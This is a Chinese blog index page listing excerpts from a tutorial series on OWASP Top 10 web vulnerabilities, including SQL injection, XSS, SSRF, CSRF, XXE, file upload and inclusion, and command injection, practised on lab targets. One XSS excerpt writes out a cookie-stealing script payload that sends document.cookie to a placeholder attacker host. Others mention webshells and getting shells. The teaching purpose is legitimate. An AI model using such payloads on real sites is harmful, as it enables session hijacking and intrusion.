OWASP TOP 10
OWASP TOP 10
Tigirs
Tigirs's blog
展开
-
OWASP TOP 10(七)XXE漏洞(XML基本语法、DTD(声明类型、数据类型、实体)、XXE漏洞原理、PHP相关函数、XML注入读取文件、漏洞防御)
文章目录XML学习一、XML概述1. 简述2. XML和HTML的区别二、基本语法规则三、DTD1. 概述2. 声明类型- 内部的 DOCTYPE 声明- 外部文档声明3. 数据类型- PCDATA- CDATA4. 实体- 内部实体声明- 外部实体声明四、XEE1. 漏洞原理2. PHP相关函数- file_get_contents()- php://input- simplexml_load_string()3. XML注入回显 输出函数XML学习一、XML概述1. 简述XML 指可扩展标记语言原创 2020-12-27 20:02:37 · 745 阅读 · 0 评论 -
OWASP TOP 10(六)反序列化漏洞(序列化和反序列化、漏洞原理、PHP中的序列化和反序列化、魔术方法、Typecho_v1.0中的反序列化漏洞)
文章目录反序列化漏洞一、概述1. 序列化和反序列化2. 序列化的目的二、PHP中的序列化与反序列化1. 概述2. 示例序列化与反序列化3. 反序列化漏洞- PHP中的魔术方法- Typecho_v1.0中的反序列化漏洞反序列化漏洞一、概述1. 序列化和反序列化序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。也就是将数据结构或对象状态转换原创 2020-12-25 11:59:16 · 616 阅读 · 0 评论 -
OWASP TOP 10(五)SSRF漏洞(概述、危害、php语言的SSRF、漏洞利用、weblogic ssrf漏洞复现、SSRF挖掘、防御、绕过限制IP)
文章目录OWASP TOP 10SSRF漏洞一、概述1. 简述2. 与CSRF区别3. SSRF危害二、PHP语言和curl扩展实现CSRF1. 实现了从服务器获取资源的基本功能2. 漏洞利用1. 访问正常文件2. 端口扫描3. 读取系统本地文件4. 内网Web应用指纹识别5. 攻击内网应用- Weblogic SSRF漏洞复现三、SSRF 漏洞的挖掘四、SSRF的防御OWASP TOP 10SSRF漏洞一、概述1. 简述互联网上的很多Web应用提供了从其他服务器(也可以是本地)获取数据的功能。使原创 2020-12-22 14:39:42 · 1091 阅读 · 0 评论 -
OWASP TOP 10(四)CSRF漏洞(概念、场景复现、GET/POST型、结合XSS、防御方法(referer、token、二次验证)、CSRFTester)
文章目录OWASP TOP 10CSRF漏洞一、概述1. 什么是CSRF?2. CSRF和XSS的区别3. CSRF场景复现3.1 场景一3.1 场景二4. CRSF的关键点和目标4.1 关键点4.2 目标5. CSRF类别5.1 GET型5.2 POST型二、案例:CSRF与XSS结合添加后台账号三、防御方法1. 无效的防御2. 有效的防御四、CSRF自动化探测OWASP TOP 10CSRF漏洞一、概述1. 什么是CSRF?跨站请求伪造(Cross-site request forgery),原创 2020-12-22 14:38:30 · 2310 阅读 · 0 评论 -
OWASP TOP 10(三)文件上传漏洞(概述、原理、webshell(大小马)、getshelll、upload-labs靶场、%00截断、.htaccess攻击、web容器解析/文件编辑器漏洞)
文章目录OWASP TOP 10文件上传漏洞一、概述1. 漏洞简述2. 漏洞成因3. 漏洞危害二、WebShell1. 概述2. 大马3. 小马3.1 概述3.2 一句话木马+中国蚁剑三、文件上传漏洞1. GetShell2. 利用的条件telnet模拟http请求3. 防御 | 绕过 | 利用黑白名单策略4. upload-labs靶场5. 前端限制与绕过6. 服务端检测6.1 检测MIME类型6.2 检测文件内容类型6.3 检测文件后缀名OWASP TOP 10文件上传漏洞一、概述1. 漏洞简述原创 2020-12-22 14:38:18 · 2641 阅读 · 0 评论 -
文件包含漏洞(概述、原理、特点、PHP中的文件包含漏洞、相关函数、本地/远程文件包含、漏洞利用、利用PHP封装协议、包含日志文件)
文章目录文件包含漏洞一、概述二、PHP中的文件包含漏洞相关1. PHP中的文件包含函数1.1 include()1.2 include_once()1.3 require()1.4 require_once()2. PHP相关配置3. 漏洞示例3.1 本地包含示例3.2 远程包含示例4. 漏洞原理5. 漏洞特点5.1 无视文件扩展名读取文件5.2 无条件解析PHP代码6. 空字符安全绕过三、漏洞利用1. 读取敏感文件2. 直接包含图片木马3. 包含木马写Shell4. 利用PHP封装协议4.1 访问本地文件原创 2020-12-22 14:38:05 · 913 阅读 · 0 评论 -
OWASP TOP 10(一)OS命令注入(概述、危害、PHP相关函数、漏洞利用、防御方法、DVWA的命令注入四个级别源码分析)
文章目录OWASP TOP 10OS命令注入一、概述二、漏洞危害三、相关函数1. system()2. exec()3. shell_exec()4. passthru()5. popen()6. 其他注入反引号``四、漏洞利用1. 查看系统文件2. 显示当前路径3. 写文件五、防御方法六、DVWA的命令注入1. low级别2. medium级别3. high级别4. impossible级别OWASP TOP 10OS命令注入一、概述程序员使用脚本语言(如PHP)开发应用程序过程中,脚本语言开发十原创 2020-12-15 22:45:11 · 1087 阅读 · 0 评论 -
OWASP TOP 10(一)PHP代码注入(概述、注入方式、漏洞利用(中国蚁剑获取shell、获取文件路径、读写文件)、防御方法、Seacms的php注入)
文章目录OWASP TOP 10PHP代码注入一、概述二、PHP相关函数&语句1. eval()2. assert()3. preg_replace4. call_user_func5. 动态函数 `$a($b)`三、漏洞利用1. 直接获取Shell2. 获取当前文件的绝对路径3. 读文件4. 写文件四、防御方法五、Seacms的php注入OWASP TOP 10PHP代码注入一、概述概述PHP代码注入(执行):在Web方面应用程序过滤不严,用户可以通过请求将代码注入到应用中执行。代原创 2020-12-15 22:45:00 · 813 阅读 · 1 评论 -
OWASP TOP 10(二)XSS漏洞(shellcode调用方法、XSS的利用)
文章目录OWASP TOP 10XSS漏洞shellcode的调用1. 远程调用2. windows.location.hash3. XSS Downloader4. 备选存储技术OWASP TOP 10XSS漏洞shellcode的调用shellcode就是在利用漏洞所执行的代码。完整的XSS攻击,会将shellcode存放在一定的地方,然后触发漏洞,调用shellcode。1. 远程调用这是比较常用的方式。将JS代码单独放在一个js文件中,然后通过http协议远程加载该脚本。如:<原创 2020-12-15 16:41:31 · 662 阅读 · 0 评论 -
OWASP TOP 10(二)XSS漏洞(盗取cookie、ms10_220_aurora漏洞、XSS平台)
文章目录OWASP TOP 10XSS一、XSS漏洞----cookie1. 盗取cookie2. 利用cookie会话劫持OWASP TOP 10XSS一、XSS漏洞----cookie1. 盗取cookie在DVWA靶场上演示。存在反射型XSS漏洞的站点位置可以利用以下链接来盗取Cookie。<script>document.location='http://ip/cookie.php文件的绝对路径?cookie='+document.cookie</script>原创 2020-12-15 16:41:22 · 611 阅读 · 1 评论 -
OWASP TOP 10(二)XSS漏洞(概述、PoC、分类、构造、变形绕过、XSS-Filter、xsser、xsstrike)
文章目录OWASP Top 10XSS一、概述二、XSS危害三、XSS相关四、使用PoC代码简单验证XSS漏洞五、XSS分类1. 反射型XSS2. 存储型XSS3. DOM型XSS六、XSS的构造1. 利用<>构造HTML或JS标签2. 伪协议3. 事件驱动七、XSS的变形1. 大小写转换2. 引号的使用3. 利用左斜线代替空格4. 添加Tab或回车符5. 对标签属性值进行转码6. 拆分跨站7. 双写绕过XSS练习平台OWASP Top 10XSS一、概述XSS被称为跨站脚本攻击(Cro原创 2020-12-15 16:40:58 · 2310 阅读 · 0 评论 -
OWASP TOP 10(一)SQL注入(SQLi-Labs(1-9)分析思路、半自动化注入)
文章目录SQL注入SQLi-LabsLess-1Less-2Less-3Less-4Less-5SQL注入SQLi-LabsLess-1字符型注入 | 单引号闭合 | 联合查询当我们传入参数 id=1 、id=2 … 页面回显不一样的内容:说明数据库中的数据可以回显到前端页面,然后需要考虑是字符型还是数字型注入,注入单引号后:页面回显报错信息You have an error in your SQL syntax; check the manual that correspo原创 2020-12-15 10:49:42 · 435 阅读 · 0 评论 -
OWASP TOP 10(一)SQL注入(自动化工具sqlmap)
文章目录sqlmap1. 概述2. 基本参数检测注入点列出所有数据库名列出当前数据库名列出数据库名表名列出表中字段名列出字段内容3. 读取post请求sqlmap1. 概述sqlmap是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。支持的数据库有:MySQL, Oracle, PostgreSQL, Microsoft SQL Serve原创 2020-12-14 11:52:21 · 1019 阅读 · 0 评论 -
OWASP TOP 10(一)SQL注入(漏洞介绍、分类、报错注入、盲注、延时注入、宽字节、cookie、base64、HTTP头部注入、绕过手段)
文章目录OWASP Top 10一、概述1. 简述2. 版本二、SQL注入1. 漏洞简介1)漏洞原理2)分类3)mysql数据库相关知识2. 测试漏洞1)注入点判断- 结果2)联合查询3)表中字段4)报错注入1. group by 重复键冲突2. XPATH报错5)布尔盲注6)延时注入三、sqlmap1. 概述2. 基本参数检测注入点列出所有数据库名列出当前数据库名列出数据库名表名列出表中字段名列出字段内容读取post请求OWASP Top 10一、概述1. 简述OWASP(开放式Web应用程序安全原创 2020-12-14 11:51:46 · 1537 阅读 · 0 评论